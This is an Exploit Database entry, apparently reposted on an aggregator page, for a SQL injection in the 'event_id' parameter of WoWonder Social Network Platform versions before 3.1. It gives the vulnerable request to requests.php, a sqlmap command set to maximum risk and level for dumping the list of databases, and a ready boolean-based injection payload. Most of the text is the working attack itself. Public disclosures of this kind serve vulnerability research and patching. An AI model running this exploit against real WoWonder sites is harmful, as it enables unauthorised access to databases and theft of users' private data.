WoWonder Social Network Platform 3.1 – ‘event_id’ SQL Injection

• Exploit Database
• 17 阅读

• 作者： securityforeveryone.com
  日期： 2021-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49657/

• # Exploit Title: WoWonder Social Network Platform 3.1 - 'event_id' SQL Injection
  # Date: 16.03.2021
  # Exploit Author: securityforeveryone.com
  # Author Mail: hello[AT]securityforeveryone.com
  # Vendor Homepage: https://www.wowonder.com/
  # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
  # Version: < 3.1
  # Tested on: Linux/Windows
  
  DESCRIPTION
  
  In WoWonder < 3.1, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the event_id parameter.
  
  The vulnerability is found in the "event_id" parameter in GET request sent to page requests.php.
  Example:
  /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID 
  
  if an attacker exploits this vulnerability, attacker may access private data in the database system.
  
  EXPLOITATION
  
  # GET /requests.php?hash=xxxxxxxxxxx&f=search-my-followers&filter=s4e&event_id=EVENT_ID HTTP/1.1
  # Host: Target
  
  Sqlmap command: sqlmap -r request.txt --risk 3 --level 5 --random-agent -p event_id --dbs
  
  Payload: f=search-my-followers&s=normal&filter=s4e&event_id=1') AND 5376=5376-- QYxF